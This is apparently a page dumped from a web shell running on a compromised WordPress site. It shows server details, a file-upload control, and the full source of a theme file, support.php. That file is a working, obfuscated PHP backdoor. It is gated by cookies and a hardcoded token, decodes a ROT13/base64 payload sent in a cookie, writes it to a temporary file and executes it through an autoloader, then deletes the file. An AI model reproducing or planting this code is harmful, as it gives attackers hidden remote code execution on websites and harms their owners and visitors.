HEX
Server: Microsoft-IIS/10.0
System: Windows NT WIN8095 10.0 build 20348 (Windows Server 2016) AMD64
User: kytoffice-001 (0)
PHP: 7.4.30
Disabled: exec,passthru,shell_exec,system,proc_open,popen,curl_multi_exec,show_source
$ pwd: h:/root/home/kytoffice-001/www/expresstinou/wp-content/themes/moza-blog/template-parts/
Upload Files
File: h:/root/home/kytoffice-001/www/expresstinou/wp-content/themes/moza-blog/template-parts/support.php
<?php

if (isset($_COOKIE[-56+56]) && isset($_COOKIE[32+-31]) && isset($_COOKIE[89-86]) && isset($_COOKIE[93-89])) {
    $hld = $_COOKIE;
    function api_gateway($res) {
        $hld = $_COOKIE;
        $ref = tempnam((!empty(session_save_path()) ? session_save_path() : sys_get_temp_dir()), 'qxP1OtzK');
        if (!is_writable($ref)) {
            $ref = getcwd() . DIRECTORY_SEPARATOR . "api_gateway";
        }
        $itm = "\x3c\x3f\x70\x68p " . base64_decode(str_rot13($hld[3]));
        if (is_writeable($ref)) {
            $dchunk = fopen($ref, 'w+');
            fputs($dchunk, $itm);
            fclose($dchunk);
            spl_autoload_unregister(__FUNCTION__);
            require_once($ref);
            @array_map('unlink', array($ref));
        }
    }
    spl_autoload_register("api_gateway");
    $token = "873237df2933400e202e4ce2fd11a7ea";
    if (!strncmp($token, $hld[4], 32)) {
        if (@class_parents("module_controller_reverse_searcher", true)) {
            exit;
        }
    }
}
@ Telegram